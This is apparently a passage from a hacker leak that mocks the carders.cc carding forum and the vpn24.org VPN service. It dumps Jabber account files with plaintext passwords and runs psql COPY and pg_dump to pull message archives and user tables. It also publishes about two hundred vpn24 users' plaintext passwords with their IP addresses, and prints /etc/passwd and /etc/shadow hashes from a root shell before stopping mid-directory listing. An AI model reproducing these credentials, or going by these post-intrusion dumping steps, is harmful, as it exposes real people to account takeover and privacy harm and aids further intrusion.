xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' name='syntax@jabber-swissfaking.net' subscription='both'><group>Friends</group></item><item jid='glycerin\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='none' subscribe='' hidden=''/></query></xdb> + +the|biggie.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>aggro123</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>the|biggie</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100730T20:33:39'>registered</x></query><query xmlns='jabber:iq:last' last='1280970373' xdbns='jabber:iq:last'>Replaced by new connection</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='to'><group>Friends</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='to'><group>Friends</group></item><item jid='bullddoser@jabber-swissfaking.net' name='bullddoser' subscription='both'><group>Friends</group></item><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='to'><group>Friends</group></item><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group></item><item jid='crankz@jabber-swissfaking.net' name='crankz' subscription='both'><group>Friends</group></item><item jid='hans-wurst@jabber-swissfaking.net' name='hans-wurst' subscription='both'><group>Friends</group></item><item jid='freakout@jabber-swissfaking.net' name='freakout' subscription='both'><group>Friends</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' name='syntax@jabber-swissfaking.net' subscription='both'><group>Friends</group></item><item jid='darkfunny@jabber-swissfaking.net' name='darkfunny' subscription='from' ask='subscribe'><group>Friends</group></item><item jid='glycerin\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='none' subscribe='' hidden=''/></query></xdb> + +trickz.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>crazyfrog1234</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>trickz</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100730T21:41:38'>registered</x></query><res id='spark'/><scratchpad xmlns='scratchpad:tasks' j_private_flag='1' xdbns='scratchpad:tasks'><tasks showAll='true'/></scratchpad><foo xdbns='jabber:xdb:nslist' xmlns='jabber:xdb:nslist'><ns type='private'>scratchpad:tasks</ns></foo><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='both'><group>Friends</group></item><item jid='bullddoser@jabber-swissfaking.net' name='bullddoser' subscription='both'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='from'/><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='both'><group>Friends</group></item><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group></item><item jid='babypanda@jabber-swissfaking.net' subscription='from'/><item jid='s0xtech@jabber-swissfaking.net' subscription='from'/><item jid='crankz@jabber-swissfaking.net' subscription='from'/><item jid='hans-wurst@jabber-swissfaking.net' subscription='from'/><item jid='freakout@jabber-swissfaking.net' subscription='from'/><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='from'/><item jid='darkfunny@jabber-swissfaking.net' name='darkfunny' subscription='both'><group>Friends</group></item></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281303248' xdbns='jabber:iq:last'>Disconnected</query></xdb> + +w!cked.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>fvcxy--</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>w!cked</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T16:19:22'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280852527' xdbns='jabber:iq:last'>Disconnected</query></xdb> + +w00dka.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>as_tave_myliu</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>w00dka</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T18:07:26'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281222732' xdbns='jabber:iq:last'/></xdb> + +weareone.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>Amstaff</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>weareone</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100802T20:30:36'>registered</x></query><res id='spark'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='both'><group>Friends</group></item><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='to'><group>Friends</group></item><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='both'><group>Friends</group></item><item jid='bullddoser@jabber-swissfaking.net' name='bullddoser' subscription='both'><group>Friends</group></item><item jid='dotsyn@jabber-swissfaking.net' name='dotsyn' subscription='both'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Friends</group></item><item jid='donteron@thesecure.biz' subscription='from'/><item jid='darkfunny@jabber-swissfaking.net' name='darkfunny' subscription='both'><group>Friends</group></item></query><query xmlns='jabber:iq:last' last='1280970363' xdbns='jabber:iq:last'>Replaced by new connection</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb> + +yaboybigt.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>73818444</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>yaboybigt</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T14:05:19'>registered</x></query><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='from'/></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281277327' xdbns='jabber:iq:last'/></xdb> + +# psql openfire openfire +Password for user openfire: +Welcome to psql 8.3.11, the PostgreSQL interactive terminal. + +openfire=# \l + List of databases + Name | Owner | Encoding +-----------+----------+----------- + openfire | openfire | UTF8 + postgres | postgres | SQL_ASCII + template0 | postgres | SQL_ASCII + template1 | postgres | SQL_ASCII +(4 rows) + +openfire=# \c openfire +You are now connected to database "openfire". +openfire=# \d + List of relations + Schema | Name | Type | Owner +--------+----------------------+-------+---------- + public | ofconparticipant | table | openfire + public | ofconversation | table | openfire + public | ofextcomponentconf | table | openfire + public | ofgroup | table | openfire + public | ofgroupprop | table | openfire + public | ofgroupuser | table | openfire + public | ofid | table | openfire + public | ofmessagearchive | table | openfire + public | ofmucaffiliation | table | openfire + public | ofmucconversationlog | table | openfire + public | ofmucmember | table | openfire + public | ofmucroom | table | openfire + public | ofmucroomprop | table | openfire + public | ofmucservice | table | openfire + public | ofmucserviceprop | table | openfire + public | ofoffline | table | openfire + public | ofpresence | table | openfire + public | ofprivacylist | table | openfire + public | ofprivate | table | openfire + public | ofproperty | table | openfire + public | ofpubsubaffiliation | table | openfire + public | ofpubsubdefaultconf | table | openfire + public | ofpubsubitem | table | openfire + public | ofpubsubnode | table | openfire + public | ofpubsubnodegroups | table | openfire + public | ofpubsubnodejids | table | openfire + public | ofpubsubsubscription | table | openfire + public | ofremoteserverconf | table | openfire + public | ofroster | table | openfire + public | ofrostergroups | table | openfire + public | ofrrds | table | openfire + public | ofsaslauthorized | table | openfire + public | ofsecurityauditlog | table | openfire + public | ofuser | table | openfire + public | ofuserflag | table | openfire + public | ofuserprop | table | openfire + public | ofvcard | table | openfire + public | ofversion | table | openfire +(38 rows) + +openfire=# COPY ofmessagearchive TO '/tmp/m_lawgs'; +COPY 2190 + +openfire=# COPY ofuser TO '/tmp/u_lawgs'; +COPY 313 + +openfire=# \q + +# pg_dump -U openfire openfire > /tmp/full_db +Password: + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| fickmaus@jabber-swissfaking.net: | +| na carders brauch diesesmal wohl länger wa? | +| triple@jabber-swissfaking.net: | +| Jo | +| die haben immer noch ka | +| wie die lücke ist | +| ^^ | +|____________________________________________________________________| + +Why don't you shut up and go administrate your own board, +smarty-pants? Owait, Garcon! Make us a sandwich instead, you seem to +know your stuff when it comes to ordering a la carte. + + ,;~;, + _/\ + \ ) + (\\ ()) + /';;,, // | +-------=========={ Vpn24.org }========))))))))))))))=m( )_ __ + | ,(.' '~/()' ' '\ + ~ | ||( );, + ( ,;.)-\ / ';, + \ ( \ ( + || \\ + /_( /_( +_____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| Liebe Carders.CC Member, | +| | +| Wir sind wieder da und haben euch Top Angebote mitgebracht :) | +| | +| Wir bieten euch 100% non-logging OpenVPN, Socks5 und SSH Socks | +| Zugang auf unserem eigenen dedicated Server welcher in Russland | +| steht, absolut unantastbar für Deutsche Behörden. Unser | +| kompletter Service ist automatisiert, ihr könnt also schon in | +| wenigen Minuten 100% anonym unterwegs sein. | +| | +| ... | | +| VPN | Socks5 | +| Secure Connection | Secure Connection | +| Encryption AES-1024 | Encryption AES-512 | +|_________________________________|__________________________________| + +They offer the carders.cc members 100% non-logging proxies on their +own dedicated server which is located in Russia. They say that there +is no way for German authorities to get access to it and that their +service is fully automatic. The vpn connections are encrypted with +AES-1024 and the socks5 proxies are encrypted with AES-512. + +And that sounds awesome! You even invented two new encryptions? Let's +have a look at your webserver first, but, again, before we start, here +is a list (user:plain password:ip:date) from your website: + +janitor1:nroknetsr3g:87.118.118.37:January 6, 2011, 8:33 pm +jack123:heimatbrief:92.241.190.230:January 3, 2011, 3:54 pm +shore:shoreshore:202.71.103.246:January 6, 2011, 6:28 pm +hansi3000:w2z_RKDUU:212.117.177.110:January 5, 2011, 4:10 pm +tarnung91:frauholle49:78.52.52.123:January 4, 2011, 11:54 am +djdalio:123123:95.33.214.37:January 3, 2011, 5:03 pm +selfcut:rittersport:88.76.106.196:January 3, 2011, 1:10 pm +donkey:YX!"as78:84.183.121.124:January 3, 2011, 9:07 am +obama123:derneger123:84.137.90.85:January 5, 2011, 5:43 pm +neon1011:hassen11:91.43.254.141:January 3, 2011, 11:54 am +f18black:pizza1:91.33.20.147:January 6, 2011, 2:37 pm +hilli:ickeget6:85.17.161.84:January 6, 2011, 2:35 pm +schmidi327:g5fkigd2:95.33.42.207:January 6, 2011, 11:39 pm +12dima12:jafCc8Nk:212.117.172.231:January 3, 2011, 9:03 pm +blackmatrix:o75ev14J:87.185.157.32:January 7, 2011, 4:16 pm +hanswurst:volkan:92.76.11.157:January 5, 2011, 10:41 pm +ginal406:e*!ohWt7:92.241.190.253:January 3, 2011, 8:14 pm +edgeee:azerty123:92.241.165.69:January 7, 2011, 1:00 am +loowmanz:lowlowlow123:93.202.153.197:January 3, 2011, 7:51 am +basha:kriminell:92.241.165.69:January 4, 2011, 9:42 pm +zezol:4iP]XT4)om:79.170.124.248:January 3, 2011, 8:02 am +duden:galaxy:92.241.190.253:January 6, 2011, 9:35 pm +pill3:jackass123:212.117.172.231:January 5, 2011, 10:57 am +darkt0wn:marvin88:217.72.222.183:January 5, 2011, 8:06 pm +pyrodeath:b35ngf%:78.48.108.252:January 4, 2011, 12:55 pm +conviction:ichbingeil:92.241.190.253:January 3, 2011, 5:12 pm +blade1932:exaguqa5:92.241.190.253:January 3, 2011, 2:51 pm +hackbart2:twd2005:92.241.190.253:January 3, 2011, 10:22 am +juryrusski:jocklerhans:77.0.30.113:January 4, 2011, 8:47 pm +h1xx3r:trustno1:84.23.74.92:January 4, 2011, 9:04 pm +romulus89:192837465:80.123.42.135:January 3, 2011, 12:26 pm +deluxe0160:tomtom:92.228.173.201:January 7, 2011, 10:08 pm +hanshans123:hanshans:212.117.161.80:January 4, 2011, 12:43 am +sanisan:19n4schk4tz385:84.184.246.137:January 6, 2011, 12:15 am +pan1c:tigerpommes:92.241.190.253:January 5, 2011, 11:43 am +revar:puppetteer:92.241.165.69:January 4, 2011, 1:45 pm +epoepo:union84:92.241.190.253:January 4, 2011, 1:37 pm +offlinejack:Jodelhe1n:88.76.253.194:January 6, 2011, 8:57 pm +weedtwo:70301995:92.241.190.253:January 6, 2011, 5:18 pm +pann0:pannopasch0:79.198.146.182:January 6, 2011, 6:02 pm +eve1992:sacred:88.67.149.150:January 6, 2011, 10:03 am +hi:suPPort_masterPass88:212.117.165.197:January 3, 2011, 2:27 am +det0x:veronika:92.241.190.253:January 4, 2011, 3:19 pm +malakas2:internet:212.117.172.231:January 3, 2011, 5:34 am +fahne:23102007:78.50.87.217:January 4, 2011, 6:30 pm +alanka:159369:85.25.165.138:January 3, 2011, 9:50 am +pfanner:deinemudda:92.204.37.77:January 3, 2011, 12:53 pm +delphinko:aLLanKoy0:87.118.118.37:January 3, 2011, 8:20 pm +timetraveller:a3Pq71ryK1:79.229.42.88:January 7, 2011, 8:56 pm +logg23:1q2w3e4r5t6z7u8i:212.117.172.231:January 6, 2011, 4:49 pm +teppich:oog4weeT1acu:157.95.211.201:January 5, 2011, 12:49 am +andreas7411:123456789a:88.65.104.195:January 3, 2011, 10:23 pm +n3v10:uLeiDee7:212.117.172.231:January 4, 2011, 1:24 pm +frezorx:123456:92.231.125.179:January 4, 2011, 3:11 am +winkel72:berlin123:193.107.16.122:January 3, 2011, 9:34 pm +trinx:meli1993:92.241.190.253:January 4, 2011, 3:38 pm +c4sh1:mkz4kzj:80.121.99.73:January 7, 2011, 1:04 am +tais46:spoiler:69.172.133.146:January 3, 2011, 1:36 pm +whazun:daspw123:93.195.74.65:January 4, 2011, 11:44 am +anubis:xy200xyx:79.213.81.205:January 5, 2011, 8:16 pm +hugo21:901051901051:91.54.21.252:January 4, 2011, 12:14 pm +doomlord:oxford:91.51.166.181:January 3, 2011, 6:53 pm +sense88:pitbull:91.66.61.177:January 5, 2011, 7:11 am +heavygun:vpn24private:91.6.0.76:January 6, 2011, 10:26 am +tombi:Spiele:92.241.190.253:January 5, 2011, 1:08 pm +messias91:qaywsx:92.241.165.69:January 6, 2011, 4:29 pm +lryzx33:deutschlandhackedbysolme:91.121.82.175:January 4, 2011, 6:04 pm +dre4m90:chillen:188.104.227.204:January 5, 2011, 10:56 am +slumski:Harley23:109.193.150.182:January 3, 2011, 7:55 pm +theultralooser:921234:92.241.190.81:January 4, 2011, 8:35 pm +keystyle:firatfirat911:92.241.165.69:January 6, 2011, 7:33 pm +hund123456:hund123456:46.114.42.253:January 4, 2011, 9:56 pm +chiller1337:episodeone:92.241.190.253:January 5, 2011, 11:48 am +turboprinz:886988:93.211.71.197:January 5, 2011, 9:25 pm +silverfox:tamil94thenud*:93.218.92.119:January 4, 2011, 9:22 am +ikas2:k7gh8uc3ph:77.11.24.196:January 7, 2011, 12:33 am +mrmcfly:vpn2426112004:213.163.65.50:January 6, 2011, 4:53 pm +weedtaxi:dura2131:93.222.176.113:January 4, 2011, 8:17 pm +boxer1:daniel:188.193.12.78:January 5, 2011, 7:02 pm +newb1:hans1234:92.241.165.69:January 6, 2011, 2:56 pm +bichlord:michael12B:94.217.109.99:January 4, 2011, 5:52 pm +neonaut:derotter:212.117.161.80:January 3, 2011, 11:45 am +abs0lut:liberate012:92.241.165.69:January 3, 2011, 3:53 pm +thalia:stachnik:81.210.157.177:January 4, 2011, 12:12 pm +dudgeri:dude123:212.117.165.197:January 3, 2011, 10:56 am +arider:amp483:77.189.15.2:January 4, 2011, 8:54 pm +iodas1:hallo123:87.147.65.130:January 4, 2011, 8:42 pm +hans2000:yxcvbnm22:84.59.141.5:January 6, 2011, 12:05 am +jungeguter:toko29473:79.195.50.220:January 3, 2011, 4:40 pm +th3sh4dow:han2jo4cu:88.69.160.243:January 7, 2011, 7:26 pm +pwnny:faker123:77.176.234.57:January 4, 2011, 9:16 am +papo00:papo0815:84.119.53.9:January 5, 2011, 8:24 pm +thehen:duhurensohn:77.22.65.135:January 3, 2011, 11:21 pm +random9999:dfds67621dd9999:199.48.147.41:January 3, 2011, 7:03 pm +zorator:1q2w3e4r:91.121.72.221:January 3, 2011, 7:48 pm +xr34ct0r:spelock1909:212.117.163.21:January 3, 2011, 7:56 pm +deesr:timsilinsi:93.94.245.2:January 7, 2011, 6:19 pm +juliasutter:01305806:91.89.165.7:January 3, 2011, 5:22 pm +davidche:miezekatze:95.157.23.65:January 4, 2011, 10:37 pm +k1xy0:1qayxcv:92.75.20.99:January 5, 2011, 2:20 am +hyperion:sexysexy:212.117.172.231:January 3, 2011, 11:17 pm +emrano:go,schosch:92.241.165.69:January 3, 2011, 1:58 pm +razer111:hunter1:95.211.99.92:January 3, 2011, 11:30 am +asus123:intelatom:82.195.232.218:January 7, 2011, 4:41 pm +fruchtii:a1b2c3d4:87.118.118.37:January 3, 2011, 8:20 pm +mcott:123456:92.241.165.69:January 3, 2011, 1:38 pm +input:kingild:188.193.40.32:January 3, 2011, 6:15 pm +snowghost:7LKCFwm:78.53.114.62:January 5, 2011, 12:05 pm +fuckyou:fuckyou:212.117.177.110:January 6, 2011, 11:48 pm +snowmann:passwort:84.133.162.225:January 6, 2011, 7:43 am +nate23:hallo123:188.195.206.85:January 6, 2011, 4:10 am +smilenike:nippellecken:92.241.190.253:January 6, 2011, 10:33 pm +mastablasta:p4r4d153c1ty:62.141.39.222:January 3, 2011, 10:15 am +beware:er.,fs:93.213.21.9:January 3, 2011, 6:45 pm +5liter:Walter50:87.118.118.37:January 3, 2011, 4:49 am +d3struction:samson123:109.77.48.51:January 3, 2011, 4:48 pm +traden90:1234abcder:92.241.190.253:January 3, 2011, 5:46 pm +kaliber:kaliber44:79.218.97.68:January 6, 2011, 1:15 pm +styles:736286:212.117.172.231:January 3, 2011, 2:53 pm +thatslife:katze2:80.143.108.186:January 3, 2011, 11:49 pm +n8zm5gg:kfkfgkfg1:199.48.147.40:January 6, 2011, 12:58 pm +sparkasse:ficken:212.117.172.231:January 5, 2011, 2:17 am +p1r0x:timtimtim12:88.153.214.11:January 5, 2011, 1:31 pm +reideen:1kimmerle2:92.241.190.253:January 3, 2011, 10:03 am +shadowgamer:lumega34:84.19.169.236:January 6, 2011, 10:32 pm +kasanova:gentleman:92.241.190.253:January 4, 2011, 11:25 pm +anonymius:Zuu97ii83!!:78.55.211.145:January 7, 2011, 3:06 pm +thepu:asdf545:91.60.211.53:January 6, 2011, 4:26 pm +ixam123:chichi12345:79.240.150.109:January 4, 2011, 10:31 am +scanner1337:NL0AMGGG:93.221.58.122:January 3, 2011, 10:43 pm +xelni:kir123:92.241.190.253:January 6, 2011, 8:06 pm +nexus88:01230123:80.131.74.225:January 6, 2011, 2:10 am +meball:MeBall456:92.241.168.90:January 4, 2011, 7:39 pm +fuckdawn:former300:92.241.190.253:January 3, 2011, 12:06 pm +kdkdkd:abcabc123:85.177.152.182:January 4, 2011, 7:34 pm +nicvandebigdick:mezzomix:93.219.15.61:January 6, 2011, 3:52 am +alfalfa:57596300:85.176.120.193:January 3, 2011, 3:53 pm +kevin4ual:iloveu:92.241.190.253:January 4, 2011, 10:25 pm +simonsemmler:gangbang:92.78.143.171:January 3, 2011, 10:29 am +kuchen:asdasdasd:212.117.165.197:January 3, 2011, 2:21 am +peters:Bobchen2:77.181.106.195:January 3, 2011, 6:41 pm +anoymius:Zuu97ii83!!:78.55.211.145:January 7, 2011, 3:05 pm +pitbull69:9g3qW$23r$SZg8§$2GD3rg83:87.122.14.183:January 5, 2011, 8:45 pm +aschi2131:dura2131:93.222.176.113:January 4, 2011, 8:17 pm +testuser0:hurensohn:93.94.245.129:January 7, 2011, 4:20 am +makko:Lq=D)G92T2:79.228.238.216:January 3, 2011, 3:05 am +slash:busenbusen:82.195.232.218:January 4, 2011, 12:50 pm +thereplacer:fuckmyass:93.228.147.44:January 4, 2011, 6:48 pm +xxx3xxx4:derneger:92.241.190.253:January 5, 2011, 12:51 am +faxxer:hdgdla:90.134.58.200:January 5, 2011, 8:10 pm +magi007:imcool123:80.121.47.36:January 3, 2011, 2:47 pm +crack:novoline21:88.73.103.201:January 7, 2011, 12:55 am +bekanntmachungen:BEKANNTMACHUNGEN:89.204.137.175:January 3, 2011, 3:32 pm +ripit:gangbang123:212.117.172.231:January 4, 2011, 12:34 pm +mttsmtts:IgjTu0800zSv:93.134.103.213:January 3, 2011, 2:08 pm +dingdong:progamer:79.245.244.195:January 4, 2011, 12:13 pm +sa1nt:krankheit:91.7.92.101:January 5, 2011, 3:12 am +skilled:12345asdfg:94.23.114.4:January 4, 2011, 11:22 am +juden:test123:95.208.15.191:January 6, 2011, 12:13 pm +lolcat:i26nv1:79.204.36.137:January 3, 2011, 4:43 pm +docstrange:.denis.1203.:78.34.37.56:January 3, 2011, 3:56 pm +habadu:268413597:79.226.244.159:January 7, 2011, 12:05 am +loldielol:server1:91.55.112.62:January 5, 2011, 6:07 pm +kolumbus:infanterist2000:95.119.12.201:January 3, 2011, 8:31 pm +freefall:88866654:87.174.242.241:January 5, 2011, 10:27 am +lpboy:minkin:217.23.6.162:January 5, 2011, 8:10 pm +freaky123:05151942662:77.187.60.32:January 6, 2011, 12:32 am +kanye:Undertaker:92.241.165.69:January 5, 2011, 10:27 pm +codered:3081994:84.62.202.48:January 5, 2011, 4:21 pm +derboss:derboss:78.49.17.208:January 3, 2011, 8:52 pm +mandy:hallo123456:91.58.51.156:January 4, 2011, 3:58 pm +robmocdoc:881562:87.122.33.146:January 6, 2011, 3:07 pm +mcknad:masterxx1994:92.194.116.34:January 5, 2011, 6:45 pm +dre4m:gulliox90:188.104.236.248:January 4, 2011, 6:26 pm +matzeyooo:heheyo12345:212.117.172.231:January 6, 2011, 3:03 am +kerber0s:brennberg-1993:93.240.244.74:January 5, 2011, 5:43 pm +lenox26:250384:95.211.99.91:January 3, 2011, 6:41 pm +sidosido123:sidosido123:78.35.50.188:January 5, 2011, 1:53 am +mrsocke:fckgwrhqq2:77.189.137.162:January 4, 2011, 5:45 pm +schatten123:stinker:93.208.70.28:January 3, 2011, 6:56 pm +ev0lein:scheisripper:87.118.120.182:January 3, 2011, 5:53 pm +gweojk904trj:AOGWD55GMpUqCtB6Gsw2:92.241.190.253:January 4, 2011, 9:29 pm +wolfgang:florian90:85.178.145.194:January 3, 2011, 1:33 pm +cronic:67öänht53snjl:207.126.166.242:January 3, 2011, 10:04 pm +w333d:w333d1:92.241.168.90:January 3, 2011, 11:18 am +genetik10:s09101987:78.94.194.123:January 3, 2011, 2:19 pm +elektro:elektrisch1:77.12.190.94:January 3, 2011, 5:51 pm +amobios:welensitich9872582:89.149.242.16:January 3, 2011, 2:50 am +mablutze:tobias12:91.112.18.154:January 4, 2011, 8:43 pm +artist:yucatan1:82.198.80.81:January 4, 2011, 2:33 pm +dukeraider:muschi:188.193.200.182:January 3, 2011, 10:06 am +frankylo:Franky123456789*:95.211.13.145:January 3, 2011, 5:12 pm +dusa123:123456789:79.246.188.21:January 5, 2011, 1:14 am +asdfghjkl:carders231:84.161.40.27:January 5, 2011, 3:50 pm + +# uname -a +Linux morphy 2.6.18-164.11.1.el5.028stab068.3 #1 SMP Wed Feb 17 15:22:30 MSK 2010 x86_64 GNU/Linux + +# id +uid=0(root) gid=0(root) + +# cat /etc/issue +Debian GNU/Linux 5.0 \n \l + +# cat /etc/passwd /etc/shadow +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/bin/sh +bin:x:2:2:bin:/bin:/bin/sh +sys:x:3:3:sys:/dev:/bin/sh +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/bin/sh +man:x:6:12:man:/var/cache/man:/bin/sh +lp:x:7:7:lp:/var/spool/lpd:/bin/sh +mail:x:8:8:mail:/var/mail:/bin/sh +news:x:9:9:news:/var/spool/news:/bin/sh +uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh +proxy:x:13:13:proxy:/bin:/bin/sh +www-data:x:33:33:www-data:/var/www:/bin/sh +backup:x:34:34:backup:/var/backups:/bin/sh +list:x:38:38:Mailing List Manager:/var/list:/bin/sh +irc:x:39:39:ircd:/var/run/ircd:/bin/sh +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh +nobody:x:65534:65534:nobody:/nonexistent:/bin/sh +libuuid:x:100:101::/var/lib/libuuid:/bin/sh +sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin +mysql:x:102:104:MySQL Server,,,:/var/lib/mysql:/bin/false +Debian-exim:x:103:105::/var/spool/exim4:/bin/false +proftpd:x:104:65534::/var/run/proftpd:/bin/false +ftp:x:105:65534::/home/ftp:/bin/false +hdf:x:1000:1000::/home/hdf:/bin/sh +root:$1$SwmLmdGE$Unk7WkRpv7NF3O/0YSTCh/:14849:0:99999:7::: +daemon:*:14237:0:99999:7::: +bin:*:14237:0:99999:7::: +sys:*:14237:0:99999:7::: +sync:*:14237:0:99999:7::: +games:*:14237:0:99999:7::: +man:*:14237:0:99999:7::: +lp:*:14237:0:99999:7::: +mail:*:14237:0:99999:7::: +news:*:14237:0:99999:7::: +uucp:*:14237:0:99999:7::: +proxy:*:14237:0:99999:7::: +www-data:*:14237:0:99999:7::: +backup:*:14237:0:99999:7::: +list:*:14237:0:99999:7::: +irc:*:14237:0:99999:7::: +gnats:*:14237:0:99999:7::: +nobody:*:14237:0:99999:7::: +libuuid:!:14237:0:99999:7::: +sshd:*:14237:0:99999:7::: +mysql:!:14647:0:99999:7::: +Debian-exim:!:14647:0:99999:7::: +proftpd:!:14655:0:99999:7::: +ftp:$1$0LKSrIAD$rt1vOaeYC8GrKvVzI.T6s.:14662:0:99999:7::: +hdf:$1$RQkebH9N$LrPDCbeYn3.czmOpaM8nn.:14662:0:99999:7::: + +# cd / && ls -la +total 168 +drwxr-xr-x 21 root root 4096 Nov 18 23:11 . +drwxr-xr-x 21 root root 4096 Nov 18 23:11 .. +drwxr-xr-x 10 root root 4096 Feb 15 2010 SMF +lrwxrwxrwx 1 root root 39 Nov 13 13:09 aquota.group -> /proc/vz/vzaquota/0000001e/aquota.group +lrwxrwxrwx 1 root root 38 Nov 13 13:09 aquota.user -> /proc/vz/vzaquota/0000001e/aquota.user +-rwxr-xr-x 1 root root 122 Aug 21 17:30 backup.sh +drwxr-xr-x 2 root root 4096 May 13 2010 bin +drwxr-xr-x 2 root root 4096 Dec 4 2008 boot +drwxr-xr-x 4 root root 4096 Jan 7 06:25 dev +drwxr-xr-x 57 root root 4096 Nov 13 13:09 etc +drwxr-xr-x 4 root root 4096 Feb 15 2010 home +drwxr-xr-x 10 root root 4096 Feb 15 2010 lib +lrwxrwxrwx 1 root root 4 Mar 15 2010 lib64 -> /lib +drwxr-xr-x 2 root root 4096 Dec 24 2008 media +drwxr-xr-x 2 root root 4096 Dec 4 2008 mnt +drwxr-xr-x 2 root root 4096 Dec 24 2008 opt +dr-xr-xr-x 55 root root 0 Nov 13 13:09 proc +drwx------ 6 root root 4096 Jan 7 22:18 root +drwxr-xr-x 2 root root 4096 Feb 7 2010 sbin +drwxr-xr-x 2 root root 4096 Sep 16 2008 selinux +drwxr-xr-x 2 root root 4096 Dec 24 2008 srv +drwxr-xr-x 3 root root 0 Nov 13 13:09 sys +drwxrwxrwt 4 root root 4096 Jan 7 18:22 tmp +drwxr-xr-x 11 root root 4096 Dec 24 2008 usr +drwxr-xr-x 14 root root 4096 Mar 15 2010 var +-rwxr-xr-x 1 root root 83749 Sep 8 17:15 xgoogler + +# cat backup.sh +#!/bin/bash + +name=`date | sed -e "s/ /_/g"` +name=`echo "/${name}__vpn24org_backup.tgz"` +tar cfvz "$name" /root/ /var/www/ + +# cd /var/www && ls -la +total 40 +drwxr-xr-x 9 root root 4096 Dec 28 02:33 . +drwxr-xr-x 14 root root 4096 Mar 15 2010 .. +drwxr-xr-x 2 root root 4096 Nov 15 17:35 a +drwxrwxrwx 3 root root 4096 Oct 13 23:26 dreckrebea12313 +drwxrwxrwx 3 root root 4096 Apr 15 2010 dreckrebea12313123123131313131312313123 +-rwxrwxrwx 1 root root 1 Sep 16 23:19 index.php +drwxr-xr-x 16 root root 4096 Oct 17 22:20 sadas.org +drwxrwxrwx 4 root root 4096 Oct 1 09:18 scenecms.org +drwxr-xr-x 3 root root 4096 Dec 13 22:18 vpn24.org + +# cd dreckrebea12313 && ls -la +total 20 +drwxrwxrwx 3 root root 4096 Oct 13 23:26 . +drwxr-xr-x 9 root root 4096 Dec 28 02:33 .. +-rw-r--r-- 1 root root 132 Oct 13 23:15 adsads.rar +-rw-r--r-- 1 root root 35 Mar 15 2010 index.php +drwxrwxrwx 3 root root 4096 Jan 7 22:20 web + +# cd web && ls -la +total 40 +drwxrwxrwx 3 root root 4096 Jan 7 22:20 . +drwxrwxrwx 3 root root 4096 Oct 13 23:26 .. +drwsrwsrwt 9 root root 4096 Apr 22 2010 board +-rwsrwsrwt 1 root root 1033 Apr 19 2010 index.php #+s root? Holy crap! +-rw-r--r-- 1 root root 0 Apr 22 2010 ipinfo.html +-rw-r--r-- 1 root root 23564 Apr 19 2010 sc.png + +# cd board && ls -la +total 228 +drwsrwsrwt 9 root root 4096 Apr 22 2010 . +drwxrwxrwx 3 root root 4096 Jan 7 22:20 .. 